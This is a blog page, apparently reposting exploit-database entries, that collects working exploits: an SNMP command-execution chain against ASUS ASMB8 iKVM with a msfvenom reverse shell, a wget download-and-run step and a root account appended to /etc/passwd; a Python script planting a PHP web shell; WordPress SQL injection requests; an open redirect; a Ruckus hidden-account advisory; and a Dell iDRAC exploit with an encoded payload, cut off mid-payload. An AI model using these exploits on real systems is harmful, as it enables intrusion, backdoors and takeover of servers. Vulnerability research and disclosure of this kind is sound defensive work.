Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86389420

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
# Date: 2023-02-16
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602

++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF
HireHackking 
# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
# Date: 1/3/2020
# Exploit Author: FULLSHADE, SC
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509
# ==================================================
# Information & description
# ==================================================
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
# ==================================================
# Manual POC
# ==================================================
# Manual POC method
# - Visit carrental > admin login > changeimage1.php
# - Upload a php rce vulnerable payload
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
# - Execute commands on the server
# ==================================================
# POC automation script
# ==================================================

import sys
import requests

print("""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution
FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
""")

def login():
    sessionObj = requests.session()
    RHOSTS = sys.argv[1]
    bigstring = "\n+-------------------------------------------------------------+\n"
    print("+-------------------------------------------------------------+")
    print("[+] Victim host: {}".format(RHOSTs))
    POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
    SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"

    # login / authentication
    payload = {"username": "admin", "password": "Test@12345", "login": ""}
    login = sessionObj.post(POST_AUTH_LOGIN, data=payload)

    # get response
    if login.status_code == 200:
        print("[+] Login HTTP response code: 200")
        print("[+] Successfully logged in")
    else:
        print("[!] Failed to authenticate")
        sys.exit()

    # get session token
    session_cookie_dic = sessionObj.cookies.get_dict()
    token = session_cookie_dic["PHPSESSID"]
    print("[+] Session cookie: {}".format(token))

    # proxy for Burp testing
    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

    # data for uploading the backdoor request
    backdoor_file = {
        "img1": (
            "1dccadfed7bcbb036c56a4afb97e906f.php",
            '<?php system($_GET["cmd"]); ?>',
            "Content-Type application/x-php",
        )
    }
    backdoor_data = {"update": ""}
    SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"

    # actually upload the php shell
    try:
        r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
        print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
    except:
        print("[!] Failed to upload backdoor")

    # get command execution
    while True:
        COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
        SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
        # get R,CE results
        respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
        print(respond.text)

if __name__ == "__main__":
    login()
HireHackking 
# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account
# Date: 2021.05.26
# Exploit Author: korelogic
# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
# Affected Product: Ruckus IoT Controller
# Version: 1.7.1.0 and earlier
# Tested on: Linux
# CVE : CVE-2021-33216,CVE-2019-1000018


KL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account
Advisory ID: KL-001-2021-007
Publication Date: 2021.05.26
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt
1. Vulnerability Details
Affected Vendor: CommScope
Affected Product: Ruckus IoT Controller
Affected Version: 1.7.1.0 and earlier
Platform: Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality
CVE ID: CVE-2021-33216
2. Vulnerability Description
An upgrade account is included in the IoT Controller OVA that
provides the vendor undocumented access via Secure Copy (SCP).
3. Technical Description
Once the OVA is imported into VirtualBox, a VMDK file is
created. The VMDK file can be mounted and the directory
structure and its contents can be perused.
An authorized_keys file exists that allows an
individual/organization possessing the SSH private key to
access the virtual appliance using the 'vriotiotupgrade'
account. The 'vriotiotupgrade' account is restricted to scp,
per the rssh configuration.
Additionally, it appears that the IoT Controller has rssh version 2.3.4
installed and in use. At the time of this advisory, there are at least
three remote command injection vulnerabilities in this particular version
of rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.
4. Mitigation and Remediation Recommendation
The vendor has released an updated firmware (1.8.0.0) which
remediates the described vulnerability. Firmware and release
notes are available at:
https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
5. Credit
This vulnerability was discovered by Jim Becher (@jimbecher)
of KoreLogic, Inc.
6. Disclosure Timeline
2021.03.30 - KoreLogic submits vulnerability details to
CommScope.
2021.03.30 - CommScope acknowledges receipt and the intention
to investigate.
2021.04.06 - CommScope notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline.
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
necessary.
2021.04.30 - CommScope informs KoreLogic that remediation for
this vulnerability will be available inside of the
standard 45 business day timeline. Requests
KoreLogic acquire CVE number for this
vulnerability.
2021.05.14 - 30 business days have elapsed since the
vulnerability was reported to CommScope.
2021.05.17 - CommScope notifies KoreLogic that the patched
version of the firmware will be available the week
of 2021.05.24.
2021.05.19 - KoreLogic requests CVE from MITRE.
2021.05.19 - MITRE issues CVE-2021-33216.
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
advisory.
2021.05.26 - KoreLogic public disclosure.
7. Proof of Concept
With the VMDK file mounted at the current working directory:
$ find . -name authorized_keys
./VRIOT/ap-images/authorized_keys
./VRIOT/ops/ap-images/authorized_keys
$ cat VRIOT/ap-images/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
chandini.venkatesh@commscope.com
$ cat VRIOT/ops/ap-images/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
chandini.venkatesh@commscope.com
$ grep "ap-images" etc/passwd
vriotiotupgrade:x:1002:1002::/VRIOT/ap-images/:/usr/bin/rssh
$ tail -8 etc/ssh/sshd_config
Match User vriotiotupgrade
PasswordAuthentication no
AuthorizedKeysFile /VRIOT/ap-images/authorized_keys
Match User vriotha
PasswordAuthentication yes
$ grep -v ^# etc/rssh.conf
logfacility = LOG_USER
allowscp
umask = 022
The contents of this advisory are copyright(c) 2021
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
HireHackking 
# Exploit Title: KodExplorer 4.52 - Open Redirect
# Date: 2024-11-08
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://kodcloud.com/
# Software Link: https://github.com/kalcaddle/KodExplorer/releases/tag/4.52
# Version: 4.52
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56

*Steps to Reproduce:*

1. At first visit this url http://target.com/index.php?user/login&link=.
2. Then use any malicious url in link parameter.
3. your link will be look like:
http://target.com/index.php?user/login&link=https://{site}.com
4. login your account and you will redirect to malicious url.
HireHackking 
# Exploit Title: Smart Manager 8.27.0 - Post-Authenticated SQL Injection  
# Date: 2024-01-18  
# Exploit Author: Ivan Spiridonov - xbz0n  
# Vendor Homepage: https://www.storeapps.org/    
# Software Link: https://www.storeapps.org/product/smart-manager/  
# Version: 8.27.0  
# Tested on: Ubuntu 22.04  
# CVE: CVE-2024-0566

## SQL Injection

The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, leading to an SQL injection exploitable by high-privilege users such as admin.

## Affected Components

- **Plugin:** Smart Manager
- **Version:** 8.27.0
- **Affected Parameters:** 'sort_params%5BsortOrder%5D', 'sort_params%5Bcolumn%5D'
- **Affected Endpoint:** /wp-admin/admin-ajax.php

## Description

The vulnerability is located within the admin AJAX endpoint in the sorting parameters 'sort_params%5BsortOrder%5D' and 'sort_params%5Bcolumn%5D'. By manipulating these parameters, authenticated attackers can inject SQL commands, leading to a time-based SQL Injection vulnerability.

## Proof of Concept

### Manual Exploitation

```http
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
```

If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.

## Recommendations

Users of Smart Manager v8.27.0 are strongly advised to restrict access to the affected endpoint and update the plugin to the latest version.
HireHackking 
# Exploit Title: WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection  
# Date: 2024-03-25  
# Exploit Author: Ivan Spiridonov - xbz0n  
# Software Link: https://codecanyon.net/item/woocommerce-customers-manager/10965432    
# Version: 29.4  
# Tested on: Ubuntu 22.04  
# CVE: CVE-2024-0399

## SQL Injection

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.

## Affected Components

- **Plugin:** WooCommerce Customers Manager
- **Version:** 29.4
- **Affected Parameters:** 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
- **Affected Endpoint:** /wp-admin/admin-ajax.php

## Description

The vulnerability is located within the transaction amount parameters like 'max_amount', 'max_amount_total', 'min_amount', and 'min_amount_total' used in the admin AJAX endpoint. By injecting SQL commands into these parameters, authenticated attackers can manipulate SQL queries leading to a time-based SQL Injection vulnerability.

## Proof of Concept

### Manual Exploitation

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="end_date"
2024-01-11
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="customer_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="category_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount_total"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount_total"
(select*from(select(sleep(20)))a)
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_filters_relationship"
and
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="statuses"
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
-----------------------------2461714219322283440478088295--
```

If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.

## Recommendations

Users of WooCommerce Customers Manager v29.4 are strongly advised to restrict access to the affected endpoint and update the plugin as soon as a fixed version is released. This advisory serves as a notice to all users of Smart Manager v8.27.0 to take immediate action in updating their plugin to protect against this SQL Injection vulnerability.
HireHackking 
# Exploit Title: Dell EMC iDRAC7/iDRAC8 2.52.52.52 -  Remote Code Execution (RCE)
 via file upload
# Date: 2024-08-28
# Exploit Author: Photubias
# Vendor Homepage: https://dell.com
# Vendor Advisory: [1] https://dl.dell.com/manuals/all-products/esuprt_solutions_int/esuprt_solutions_int_solutions_resources/dell-management-solution-resources_White-Papers6_en-us.pdf
# Version: integrated Dell Remote Access Console v7 & v8 < 2.52.52.52
# Tested on: iDRAC 7 & 8
# CVE: CVE-2018-1207

r'''
    Copyright 2024 Photubias(c)        
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
    
    File name CVE-2018-1207.py
    written by Photubias

    CVE-2018-1207 is an unauthenticated file upload and 
     so library execution vulnerability on the HTTPS web interface. 
    This exploit contains a checker and a builtin exploit to add a webuser for remote admin access
    
    # Manual verification example, if libraries are returned, the target is vulnerable: 
    #      curl -ik "http://192.168.1.100//cgi-bin/login?LD_DEBUG=files"
    
    Feel free to scan your network via the iDRAC fingerprinter to find vulnerable systems:
    https://github.com/tijldeneut/Security/blob/master/iDRAC-fingerprinter.py

    This is a native implementation, written in Python 3 and only requires requests (pip3 install requests)
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    Features: vulnerability checker + exploit

    WARNING: The built-in payload is precompiled and does this:
    - Configure USER ID 13 with username 'user', password 'Passw0rd' and as an iDRAC webadmin
    - Any user that might be at ID 13 will be overridden and is unrecoverable
    - TIP1: use racadm for command line access after exploitation (also uses TCP/443)
    - TIP2: use racadm to retrieve user hash with command: racadm -r <ip> -u user -p Passw0rd get iDRAC.Users.2
'''

import requests, optparse, base64, struct, time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
requests.warnings.filterwarnings('ignore', category=DeprecationWarning) 

iTimeout = 10

sPayloadCode ='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